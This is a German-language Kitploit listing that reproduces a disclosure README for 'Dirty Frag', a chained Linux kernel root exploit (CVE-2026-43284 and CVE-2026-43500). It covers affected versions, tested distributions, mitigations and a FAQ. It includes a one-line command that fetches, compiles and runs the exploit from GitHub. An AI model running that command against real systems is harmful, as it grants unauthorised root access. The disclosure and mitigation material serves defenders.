Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-43284 | Kitploit
Tools/GitHubGitHub/frosterdl/cve-2026-43284
Privilege EscalationSchwachstellenanalyseExploitationLernen & BildungBinary-Exploitation
GitHubfrosterdl/cve-2026-43284

CVE-2026-43284

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Dirty Frag: Universelle Linux-LPE

Abstract

Dieses Dokument erläutert die Schwachstellenklasse Dirty Frag, entdeckt und gemeldet von Hyunwoo Kim (@v4bel). Durch die Verkettung von xfrm-ESP Page-Cache Write (CVE-2026-43284) mit RxRPC Page-Cache Write (CVE-2026-43500) kann ein Angreifer auf großen Linux-Distributionen Root-Rechte erlangen.

Dirty Frag gehört zur gleichen Fehlerfamilie wie Dirty Pipe und Copy Fail. Es handelt sich um einen deterministischen Logikfehler, der nicht auf Timing-Fenster oder Race Conditions angewiesen ist, bei Fehlern keinen Kernel-Panic verursacht und bei der Ausnutzung eine sehr hohe Erfolgsrate aufweist.

Technische Details und den Offenlegungszeitplan finden Sie im begleitenden Write-up (nicht in diesem Repository enthalten).

  • xfrm-ESP Page-Cache Write (CVE-2026-43284) wurde im Mainline-Kernel mit Commit f4c50a4034e6 behoben.
  • RxRPC Page-Cache Write (CVE-2026-43500) wurde im Mainline-Kernel mit Commit aa54b1d27fe0 behoben.

[!NOTE] Als dieses Dokument erstmals veröffentlicht wurde (2026-05-07), war das Embargo bereits extern gebrochen. Zu diesem Zeitpunkt waren weder ein öffentlicher Patch noch eine CVE verfügbar. Nach Gesprächen mit den Maintainern auf [email protected] wurde die Offenlegung von Dirty Frag veröffentlicht. Den Zeitplan finden Sie im technischen Write-up.

Ausnutzung

Schneller Einzeiler

root@kitploit:~
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Dieser PoC wird nach Absprache mit linux-distros zu Informationszwecken geteilt. Führen Sie ihn nicht gegen Systeme aus, die Sie nicht testen dürfen.

Bereinigung

⚠️ Wichtig: Die Ausführung des Exploits verunreinigt den Page Cache. Um einen sauberen Zustand wiederherzustellen, führen Sie entweder Folgendes aus:

root@kitploit:~
echo 3 > /proc/sys/vm/drop_caches

oder starten Sie die Maschine neu.

Betroffene Versionen

  • CVE-2026-43284: xfrm-ESP Page-Cache Write ist von cac2661c53f3 (2017-01-17) bis f4c50a4034e6 (2026-05-05) vorhanden.
  • CVE-2026-43500: RxRPC Page-Cache Write ist von 2dc334f1a63a (2023-06-08) bis aa54b1d27fe0 (2026-05-10) vorhanden.

Diese Schwachstellen decken damit einen Zeitraum von rund neun Jahren ab.

Getestete Distributionsversionen umfassen:

  • Ubuntu 24.04.4: 6.17.0-23-generic
  • RHEL 10.1: 6.12.0-124.49.1.el10_1.x86_64
  • openSUSE Tumbleweed: 7.0.2-1-default
  • CentOS Stream 10: 6.12.0-224.el10.x86_64
  • AlmaLinux 10: 6.12.0-124.52.3.el10_1.x86_64
  • Fedora 44: 6.19.14-300.fc44.x86_64
  • ...

Gegenmaßnahmen

  1. Um die betroffenen Module zu entfernen und den Page Cache zu leeren, führen Sie Folgendes aus:
root@kitploit:~
sh -c "printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2>/dev/null; echo 3 > /proc/sys/vm/drop_caches; true"
  1. Wenden Sie Distributions-Backports oder Hersteller-Patches an, sobald diese verfügbar sind.

FAQ

Warum zwei Schwachstellen verketten?

xfrm-ESP Page-Cache Write bietet eine starke beliebige 4-Byte-STORE-Primitive ähnlich wie Copy Fail und ist auf vielen Distributionen verfügbar, erfordert jedoch Privilegien zur Erstellung eines Namespace.

Ubuntu kann die Erstellung nicht privilegierter User-Namespaces über AppArmor einschränken, wodurch verhindert wird, dass xfrm-ESP ausgelöst wird. RxRPC Page-Cache Write erfordert keine Privilegien zur Namespace-Erstellung, aber das Modul rxrpc.ko ist auf vielen Distributionen standardmäßig nicht vorhanden. Auf Ubuntu ist rxrpc.ko jedoch typischerweise geladen.

Die Verkettung beider Schwachstellen deckt die jeweiligen Lücken der anderen ab und ermöglicht so Root-Rechte auf allen großen Distributionen. Details finden Sie im technischen Write-up.

Noch eine "branded" "Dirty"-Serie?

Ja – Dirty Frag ist mit "Dirty Pipe" verwandt, und der Name spiegelt wider, dass diese Fehlerklasse das frag-Mitglied von struct sk_buff verändert.

Zusammenhang mit "Copy Fail"?

Copy Fail hat diese Forschung inspiriert. xfrm-ESP Page-Cache Write in der Dirty-Frag-Kette teilt sich mit Copy Fail dieselbe Senke, löst aber auch dann aus, wenn die algif_aead-Mitigation vorhanden ist. Daher können Systeme, die gegen Copy Fail gehärtet sind, weiterhin anfällig für Dirty Frag sein.

Wie repariere ich mein Linux?

Befolgen Sie die Schritte im Abschnitt „Gegenmaßnahmen“ oben.

Kontakt

Maintainer: https://linkedin.com/in/tahamuhammadshafiq

Tool herunterladen